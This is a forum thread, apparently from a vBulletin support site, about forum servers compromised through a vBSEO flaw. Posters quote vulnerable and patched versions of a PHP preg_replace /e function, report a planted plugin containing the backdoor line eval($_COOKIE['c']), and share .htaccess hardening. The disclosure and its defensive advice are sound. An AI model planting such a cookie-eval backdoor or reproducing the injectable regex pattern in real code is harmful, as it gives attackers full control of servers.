Originally posted by Talaturen
View Post
Announcement
Collapse
No announcement yet.
Possible Exploit
Collapse
X
-
-
Originally posted by Jafo View PostHere it is folks, in functions_vbseocp_abstract.php
PHP Code:public static function proc_deutf($ptxt, $tocharset)
{
$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);
return $ptxt;
}
PHP Code:public static function proc_deutf($ptxt, $tocharset)
{
$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);
return $ptxt;
}
Leave a comment:
-
It seems like people believe this latest vBSEO patch fixes this. IT DOES NOT. 3.6.0 of vBSEO had this patch since release (so users of vBSEO 3.6.0 don't have to apply the patch today as it doesn't patch anything) and my forum has been running with it. This exploit plugin has been added while the forums were already running vBSEO 3.6.0! The current code is still vulnerable!
Leave a comment:
-
Originally posted by DigitalCrowd View PostI have a number of sites I've checked with VBSEO installed and they didn't have this plugin. However a few sites all with vBSEO have them. One site had a "test" plugin for ajax_complete and it referenced:
eval($_COOKIE['c']);
Here is a site that references a PHP compromise with similar code...
http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://www.dis9.com/tools&ei=nH8dT9XALMSKsQLH4dSdCw&sa=X&oi=translate&ct=result&resnum=2&ved=0CDYQ7gEwAQ&prev=/search%3Fq%3Deval(%24_COOKIE%5B%27c%27%5D)%3B%26hl%3Den%26safe%3Doff%26client%3Dsafari%26r ls%3Den%26prmd%3Dimvns
This is a very bad plugin. Very bad. You need to remove it as quickly as possible. With it, your attackers could gain access to your entire server.
Leave a comment:
-
It is vBSEO.
All our non-vBSEO sites did not get hacked.
All our vBSEO sites without "Add Page Titles to External Links Anchor Text" enabled did not get hacked.
All our vBSEO sites with "Add Page Titles to External Links Anchor Text" enabled got hacked.
We have every single directory properly permissioned via Apache CONF file and by hand issuing CHMOD commands. We also have our AdminCP in a different directory and it is password protected through .htpasswd.
There are no entries in Control Panel logs that relate to this plugin creation. It was done via injection.
Leave a comment:
-
Originally posted by Ace View PostJust in case - you do have the following .htaccess protection in all writable directories?
Code:<Files ~ "\.(php\d*|cgi|pl|phtml)$"> order allow,deny deny from all </Files>
Trust me, the reason this happened is because that patch was missing.. Bots have been searching for this exploit for almost a year now.. When we upgraded to 3.6.0 the hole was reopened and the bots did what they do.
Leave a comment:
-
Just in case - you do have the following .htaccess protection in all writable directories?
Code:<Files ~ "\.(php\d*|cgi|pl|phtml)$"> order allow,deny deny from all </Files>
Leave a comment:
-
Just got a confirmation from vbseo that the patch was in their repo, but not in the current version. They said they have updated the current version just now to include the patch.. I really hope they notify their customer base because this exploit is a year old. Bots are probably pre-programmed with this attack vector and there are likely hundreds of them. If you have updated vbseo in the last year, you stand a good chance of being vulnerable. UPGRADE YOUR INSTALL NOW!
Leave a comment:
-
Brianso, please look at the above code.. We went through this a year ago, you guys worked with us to supply the patch, but you guys never included it in your product! That is why we got hit, because we just upgraded to the latest version.
Leave a comment:
-
Title replaces happen real-time as the page is pulled. These are not stored anywhere.
I highly suggest checking your server logs for more detailed information or entries relating to product changes.
Leave a comment:
-
Here it is folks, in functions_vbseocp_abstract.php
PHP Code:public static function proc_deutf($ptxt, $tocharset)
{
$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);
return $ptxt;
}
PHP Code:public static function proc_deutf($ptxt, $tocharset)
{
$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);
return $ptxt;
}
Last edited by Jafo; Mon 23 Jan '12, 8:32am.
Leave a comment:
-
OK. Best of luck figuring it out, I'm watching your ticket with great interest.
<-- works there.
Leave a comment:
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Leave a comment: